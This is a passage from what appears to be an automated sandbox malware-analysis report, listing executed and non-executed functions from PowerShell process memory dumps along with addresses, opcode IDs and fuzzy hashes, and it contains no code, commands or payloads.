                                                                                            • Instruction Fuzzy Hash: 8F110232B0EA890FE6A1EB6C64A54B87BD1EF4231074A00B6D19CD7097DD9DAC108341
                                                                                            Function 00007FFD344B681E Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2333651167.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd344b0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (Bo4
                                                                                            • API String ID: 0-4094526142
                                                                                            • Opcode ID: d586ffc6c724c6b40fa940818bfa91e5fd5f8de878864b727991c20524795b73
                                                                                            • Instruction ID: 17e24f5125574496d2951fc90c480223490bc13235612fc77e8403e32be929e3
                                                                                            • Opcode Fuzzy Hash: d586ffc6c724c6b40fa940818bfa91e5fd5f8de878864b727991c20524795b73
                                                                                            • Instruction Fuzzy Hash: 93113672B0EA884FEBA1DE9844A41687BE1EF16310F0500BFC6CDDB0A3DD68AC40C311
                                                                                            Function 00007FFD343E9750 Relevance: .1, Instructions: 141COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2332615353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd343e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2eb95d225d8e92841b71588c9d99a980d7b06a168698027accb4469618410aa5
                                                                                            • Instruction ID: 039afb66849f9c3058460f4b3b0d3608884afb804a4b2120746c8aeae0120622
                                                                                            • Opcode Fuzzy Hash: 2eb95d225d8e92841b71588c9d99a980d7b06a168698027accb4469618410aa5
                                                                                            • Instruction Fuzzy Hash: A5410931A1DB888FDB199F5C9C4A6A97FE0FB56310F0441AFD489D3293DA74A845CBC2
                                                                                            Function 00007FFD342CEE20 Relevance: .1, Instructions: 126COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2327750736.00007FFD342CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd342cd000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 96c3b969fe4860924f2090ed0c47daa6f5ff3d924bd9abce0cc841286a742c9d
                                                                                            • Instruction ID: f325d11635ed54ab1b7f9ae2f98dc9004a53d9ebb49f9d04cd2f2a72e9eeaac1
                                                                                            • Opcode Fuzzy Hash: 96c3b969fe4860924f2090ed0c47daa6f5ff3d924bd9abce0cc841286a742c9d
                                                                                            • Instruction Fuzzy Hash: 4841037180DBC48FE7569B2898919523FF0EF53220B1905EFD088CB1A3D629AC46C792
                                                                                            Function 00007FFD343EA49C Relevance: .1, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2332615353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd343e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4a6c919d581cdefeca592a83364f96ae4dcd7102e07bb1973eabb03a67af2cf0
                                                                                            • Instruction ID: 1cbfbf7874e3ecc619573ceba717e743968dc5abc992e27a40c922d9d6c07eb6
                                                                                            • Opcode Fuzzy Hash: 4a6c919d581cdefeca592a83364f96ae4dcd7102e07bb1973eabb03a67af2cf0
                                                                                            • Instruction Fuzzy Hash: E321F83190CB4C8FDB59EBAC984A7E97FF0EB96321F04416FD049C3152DA74A856CB92
                                                                                            Function 00007FFD343E33B5 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2332615353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd343e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                            • Instruction ID: 07153bfff212aaad96003ade6bf91a3dbe2d75e7666bf71565220f847edb9ce7
                                                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                            • Instruction Fuzzy Hash: 3801677125CB0C4FD748EF4CE451AA6B7E0FB95364F10066DE58AC3651DA36E882CB46
                                                                                            Function 00007FFD343EA0FB Relevance: .0, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2332615353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd343e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1989f70f39eae5eba778530b61089f706595a030d0f8c36b0ef8116e9401d837
                                                                                            • Instruction ID: b4c758873288e84313672f15d6260690cdd00a52a0e03da9b28eb33b9bd2bf96
                                                                                            • Opcode Fuzzy Hash: 1989f70f39eae5eba778530b61089f706595a030d0f8c36b0ef8116e9401d837
                                                                                            • Instruction Fuzzy Hash: 65F0FC37649A8C4FDB42EF2C98650E57FD0FF67315B0502B7D508C7151DA264848C782

                                                                                            Non-executed Functions

                                                                                            Function 00007FFD343E8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2332615353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd343e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                                            • API String ID: 0-962139525
                                                                                            • Opcode ID: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
                                                                                            • Instruction ID: 545cba7b2c0b5f45b998097f767a30dcb2b5499d62b8caa42f47cd49acb2aa8f
                                                                                            • Opcode Fuzzy Hash: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
                                                                                            • Instruction Fuzzy Hash: 0921F273B045258AC31237ACB8519D97794DF5437A39A03F3E028DF193E929A4CB8A80

                                                                                            Executed Functions

                                                                                            Function 00007FFD344A681E Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2476642207.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (Bn4
                                                                                            • API String ID: 0-3977688063
                                                                                            • Opcode ID: 8eb04237c841061fc50f2d10c8547869e05405832ebf73bde496954e783df8d2
                                                                                            • Instruction ID: 6c939969a8a01000b84533a96eedad49fa4b7edd6981162025f4e40bf3d475dd
                                                                                            • Opcode Fuzzy Hash: 8eb04237c841061fc50f2d10c8547869e05405832ebf73bde496954e783df8d2
                                                                                            • Instruction Fuzzy Hash: E0110672B0FA894FEBA1DE9850A45B87BE1EF5A310F0500BFC58DDB197DD28A845C311
                                                                                            Function 00007FFD343D9D28 Relevance: .2, Instructions: 220COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2475706973.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7d14f4b168ca4926aacaf3fa661451cd51db53c7060d175d0368faae94ccd880
                                                                                            • Instruction ID: ad5d40eaea8e200b6a093e7e2ebfb55d91f09c3b51300899bd346905b09ebbc1
                                                                                            • Opcode Fuzzy Hash: 7d14f4b168ca4926aacaf3fa661451cd51db53c7060d175d0368faae94ccd880
                                                                                            • Instruction Fuzzy Hash: B0F0E931509A8C8FCB45EF2C94651A87FF0FF2A200B0401E7E84DC7061DA369D14C781
                                                                                            Function 00007FFD343D9728 Relevance: .1, Instructions: 144COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2475706973.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 92aaaecda559d9a505af4042ca1b1846694bcac74fb480ea78896ea1e7872cf2
                                                                                            • Instruction ID: 206782d81fd88af2ab3962387340e92e93a68a50a26a4f5b26f8edd8d618e2d8
                                                                                            • Opcode Fuzzy Hash: 92aaaecda559d9a505af4042ca1b1846694bcac74fb480ea78896ea1e7872cf2
                                                                                            • Instruction Fuzzy Hash: FF413D31A0DB884FDB08AB5C984A6B9BBE0FB55310F14416FE449D3292DA34B855CBC2
                                                                                            Function 00007FFD342BEF00 Relevance: .1, Instructions: 125COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2474877195.00007FFD342BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342BD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd342bd000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d72d1f1346504198c08d4af62f351b7752e5277f7874800ef9cf445bcfb950f0
                                                                                            • Instruction ID: 1b85e45f77ca423e5588e50e300c46d4fa5794608aa802fb745bd3a122956723
                                                                                            • Opcode Fuzzy Hash: d72d1f1346504198c08d4af62f351b7752e5277f7874800ef9cf445bcfb950f0
                                                                                            • Instruction Fuzzy Hash: 5441297140DBC44FD75B9B3998559523FF0EF53320B1905DFD088CB1A3DA6AA846C7A2
                                                                                            Function 00007FFD343DA7CC Relevance: .1, Instructions: 114COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2475706973.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7be0dceff490aad6fb6f60a6dfe766785a6b7776e8a663cebf37736c921f3525
                                                                                            • Instruction ID: 910e7534074bdd72a30f6330b7b871dc72a5afd30df0fb0fbfd3492bc1df53d2
                                                                                            • Opcode Fuzzy Hash: 7be0dceff490aad6fb6f60a6dfe766785a6b7776e8a663cebf37736c921f3525
                                                                                            • Instruction Fuzzy Hash: 1F31083190C7488FDB59DF5C98496B97BF0EB67320F04416FD449C7162D674A84ACB91
                                                                                            Function 00007FFD343D33B5 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2475706973.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                            • Instruction ID: 36244d86933e0c8f26a47dd4d49cb58ef4198a5314763e2dd3cfdd5a3badc4b9
                                                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                            • Instruction Fuzzy Hash: 5001677125CB0C4FD748EF4CE451AA5B7E0FB95364F10066DE58AC3651DA36E882CB46
                                                                                            Function 00007FFD344A414D Relevance: .0, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2476642207.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8b16e96691e6b9fd6b3c6e010f46d332a63262ccbacafdb2254b3d1dff21d6d5
                                                                                            • Instruction ID: ea181ce2ac9a7b4e56b9179bb36fc770b355a82f9f5efa9a85a9274cddf1c445
                                                                                            • Opcode Fuzzy Hash: 8b16e96691e6b9fd6b3c6e010f46d332a63262ccbacafdb2254b3d1dff21d6d5
                                                                                            • Instruction Fuzzy Hash: 71F0BE32B0D5148FDBA8EB8CF4A84A877E5EF5632171600BAE15DC7167DA2AEC40C740
                                                                                            Function 00007FFD344A4400 Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2476642207.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ebf203ff7e46d37984dc3f014a37674e0a82800bbf86f493c519be4e455e16ee
                                                                                            • Instruction ID: 0914a620f53d3b6d39335e0686997315d9a106b367ddd1725a762437a1ccf057
                                                                                            • Opcode Fuzzy Hash: ebf203ff7e46d37984dc3f014a37674e0a82800bbf86f493c519be4e455e16ee
                                                                                            • Instruction Fuzzy Hash: FCF05E32A0D5448FEBA4EB4CE4A14E877E0EF4632475600B6E15DCB467DA2AAC40C750
                                                                                            Function 00007FFD344A41D1 Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2476642207.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                            • Instruction ID: 041fe14c17ebd3973d1da0dec6e22d30a4cad49f73de8dda0137f5f9e64c194f
                                                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                            • Instruction Fuzzy Hash: 3EE0123170C4148FD7A8DA0CF0989AD73E1EB9933171101B7D24EC7565C625EC519B80

                                                                                            Non-executed Functions

                                                                                            Function 00007FFD343D8BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2475706973.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: N_^6$N_^<$N_^F$N_^I$N_^J
                                                                                            • API String ID: 0-4116931533
                                                                                            • Opcode ID: 4488404bc8ae31a008ec9fb42eb0aec430a88785829394b4aa67b8cb2f0cfac0
                                                                                            • Instruction ID: e28c0f620ce0d449d45828b8f7b0426ca146e1db533790180f55d9c927756db4
                                                                                            • Opcode Fuzzy Hash: 4488404bc8ae31a008ec9fb42eb0aec430a88785829394b4aa67b8cb2f0cfac0
                                                                                            • Instruction Fuzzy Hash: 622100777094265FD31277EDBC205D97798DBA42B674802B3D358DB603D92560CB87C1
                                                                                            Function 00007FFD343D8995 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2475706973.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: N_^$N_^$N_^$N_^
                                                                                            • API String ID: 0-3900292545
                                                                                            • Opcode ID: f505ddfec79cf9bcf986afda262a55539c439bfe1e1a9d98730fba716cdb680f
                                                                                            • Instruction ID: 70f56966053ca2ec4c03c263c8feb5aeb13dee1644b4b4ee2097f9d8b33ff552
                                                                                            • Opcode Fuzzy Hash: f505ddfec79cf9bcf986afda262a55539c439bfe1e1a9d98730fba716cdb680f
                                                                                            • Instruction Fuzzy Hash: 3A4162A6A0F6C25FE30B57284CA50557FA1FF53318F4A05F6C294CF0A3EA2969068752

                                                                                            Executed Functions

                                                                                            Function 00007FFD344A4073 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2655092393.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8>n4
                                                                                            • API String ID: 0-3773068628
                                                                                            • Opcode ID: ca633f496c490a9643f606c64aed51062a85f2a7fec12cfe6f7775ce7e106a20
                                                                                            • Instruction ID: e7005d88ceb50038c741335eeb1d3ebd376cc00c691395e540af28b12e82552c
                                                                                            • Opcode Fuzzy Hash: ca633f496c490a9643f606c64aed51062a85f2a7fec12cfe6f7775ce7e106a20
                                                                                            • Instruction Fuzzy Hash: 2A515733B0EA560FE7E99A5C64A52B877D2DF96221B5900BBC24DC729BDD1CEC028341
                                                                                            Function 00007FFD344A40BF Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2655092393.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8>n4
                                                                                            • API String ID: 0-3773068628
                                                                                            • Opcode ID: e5255eae0fe16d8d22e5514755a67000d6cb3614da6116f09a17ec9dc11fbd30
                                                                                            • Instruction ID: 5517fa1c11914ee439f93c8fa3c00b628f1e3d36af65056e6da28ec5c3a8edc8
                                                                                            • Opcode Fuzzy Hash: e5255eae0fe16d8d22e5514755a67000d6cb3614da6116f09a17ec9dc11fbd30
                                                                                            • Instruction Fuzzy Hash: B121F233B0FA960FE7E5DA1C64B917866D2EF56221B5A00BAD24DC71ABCD5CEC059301
                                                                                            Function 00007FFD344A43CA Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2655092393.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: p>n4
                                                                                            • API String ID: 0-3192128902
                                                                                            • Opcode ID: ebf3bd615cf60ab6e4d6895176961cf6ecf84c205461fc3bcb0939a3c8ade7a8
                                                                                            • Instruction ID: 7048d13326d5912b5b2d8abd7d0665fb4979230687fcabe73b5fb002c913f576
                                                                                            • Opcode Fuzzy Hash: ebf3bd615cf60ab6e4d6895176961cf6ecf84c205461fc3bcb0939a3c8ade7a8
                                                                                            • Instruction Fuzzy Hash: D611E132B0F5494FE7E1EA5CA4A55B877D1EF86324B5A00FAD25CCB09BDD6DAC018340
                                                                                            Function 00007FFD344A681E Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2655092393.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (Bn4
                                                                                            • API String ID: 0-3977688063
                                                                                            • Opcode ID: 8eb04237c841061fc50f2d10c8547869e05405832ebf73bde496954e783df8d2
                                                                                            • Instruction ID: 6c939969a8a01000b84533a96eedad49fa4b7edd6981162025f4e40bf3d475dd
                                                                                            • Opcode Fuzzy Hash: 8eb04237c841061fc50f2d10c8547869e05405832ebf73bde496954e783df8d2
                                                                                            • Instruction Fuzzy Hash: E0110672B0FA894FEBA1DE9850A45B87BE1EF5A310F0500BFC58DDB197DD28A845C311
                                                                                            Function 00007FFD343D9574 Relevance: .3, Instructions: 315COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2653817790.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d16f604f305508859daab59c7dcb73f589788899ba7d4d001118bfdd631574e0
                                                                                            • Instruction ID: eb87131295946cdfd022f8b2d2b78a590076aac418ce33d5a436602d75707785
                                                                                            • Opcode Fuzzy Hash: d16f604f305508859daab59c7dcb73f589788899ba7d4d001118bfdd631574e0
                                                                                            • Instruction Fuzzy Hash: 65B1E662A4E7C54FE702AB6C5C691A57FB1EF63224F0801FBC1D8CB193D9296805CB92
                                                                                            Function 00007FFD342BE620 Relevance: .1, Instructions: 124COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2652574451.00007FFD342BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342BD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd342bd000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4a02827043edf0971a6fd48766802e53a18aedf81a18593fc8c307c7824b88c3
                                                                                            • Instruction ID: 007b13bb36e21944e3cf8bac17d0e496552f6fbdce1f86ba9ff17a00608c3820
                                                                                            • Opcode Fuzzy Hash: 4a02827043edf0971a6fd48766802e53a18aedf81a18593fc8c307c7824b88c3
                                                                                            • Instruction Fuzzy Hash: 6641397140DBC44FE75A9B3998959523FF0EF57320B1906DFD088CB1A3DA29E846C792
                                                                                            Function 00007FFD343DA49C Relevance: .1, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2653817790.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 195c22e560a656fa644cb9da7f8e134fa58a0d18e9d58e466411b9749018c1e8
                                                                                            • Instruction ID: 5db5850aeeb0722b71d66dc13e9a7038ad02d472d3a53df3b7ff53bd19e4cc4c
                                                                                            • Opcode Fuzzy Hash: 195c22e560a656fa644cb9da7f8e134fa58a0d18e9d58e466411b9749018c1e8
                                                                                            • Instruction Fuzzy Hash: 9221283190CB4C4FDB59EBAC988A7E97FF0EB97320F04416BD048C3152D675A846CB92
                                                                                            Function 00007FFD343D33B5 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2653817790.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                            • Instruction ID: 36244d86933e0c8f26a47dd4d49cb58ef4198a5314763e2dd3cfdd5a3badc4b9
                                                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                            • Instruction Fuzzy Hash: 5001677125CB0C4FD748EF4CE451AA5B7E0FB95364F10066DE58AC3651DA36E882CB46
                                                                                            Function 00007FFD343DA0FB Relevance: .0, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2653817790.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d00dc50393e3a0a9ad6d5b2ff36c35a4c9d598d8c14f8e993442417b0de5d5cb
                                                                                            • Instruction ID: 3de50e4178f188941c343e9f3c8c38f822790f39a5207bca7b66efcf9f400824
                                                                                            • Opcode Fuzzy Hash: d00dc50393e3a0a9ad6d5b2ff36c35a4c9d598d8c14f8e993442417b0de5d5cb
                                                                                            • Instruction Fuzzy Hash: 03F02B36619A8C4FDB41EF2C98651D57FA0FF76205F0401BBD649C7121D7319418C7C2

                                                                                            Non-executed Functions

                                                                                            Function 00007FFD343D8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2653817790.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                                            • API String ID: 0-2388461625
                                                                                            • Opcode ID: c2f823834917604030f606e4ac28406e5d14685f992dda4079306600a8d4c0a4
                                                                                            • Instruction ID: b57d4ced5de6c3e749471d277341d97e57621474186b0dcfffcc35e3fe41a2cc
                                                                                            • Opcode Fuzzy Hash: c2f823834917604030f606e4ac28406e5d14685f992dda4079306600a8d4c0a4
                                                                                            • Instruction Fuzzy Hash: 25210473B095214AC31237FCBCA15D96B95DF5437935901F3E228DF113D929A4CB8682

                                                                                            Executed Functions

                                                                                            Function 00007FFD34401145 Relevance: .6, Instructions: 640COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
